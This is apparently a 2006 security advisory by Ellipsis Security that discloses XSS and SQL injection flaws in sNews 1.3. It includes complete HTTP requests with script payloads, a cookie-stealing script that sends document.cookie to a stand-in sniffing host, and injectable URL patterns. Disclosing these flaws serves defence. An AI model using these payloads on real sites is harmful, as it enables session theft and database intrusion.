Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13430
HistoryJul 06, 2006 - 12:00 a.m.

sNews 1.3 XSS SQL

2006-07-0600:00:00
vulners.com
13

sNews 1.3
http://snews.solucija.com

Cross Site Scripting (XSS)

POST http://target.xx:80/index.php HTTP/1.0
Accept: /
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 88
pojam=<script>alert(/EllipsisSecurityTest/)</script>&search=search

POST http://target.xx:80/index.php HTTP/1.0
Accept: /
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 130
text=1&name=1&id="><script>alert(/EllipsisSecurityTest/)</script>&commentspage=1&comment=test

POST http://target.xx/index.php HTTP/1.0
Accept: /
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 130
pojam=&text=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Ftarget.xx%2Fsniff%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E&name=Ellipsis+Test&id=1&commentspage=1&comment=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C

<script>img = new Image(); img.src = "http://sniff.xx/s.gif?&quot;+document.cookie;&lt;/script&gt;

SQL injection

http://target.xx/index.php?id=&#39;[SQL]
http://target.xx/index.php?category=&#39;[SQL]
http://target.xx/index.php?PHPSESSID=&amp;id=[SQL]
http://target.xx/index.php?id=1&#39;[SQL]&amp;commentspage=1

Ellipsis Security
http://www.ellsec.org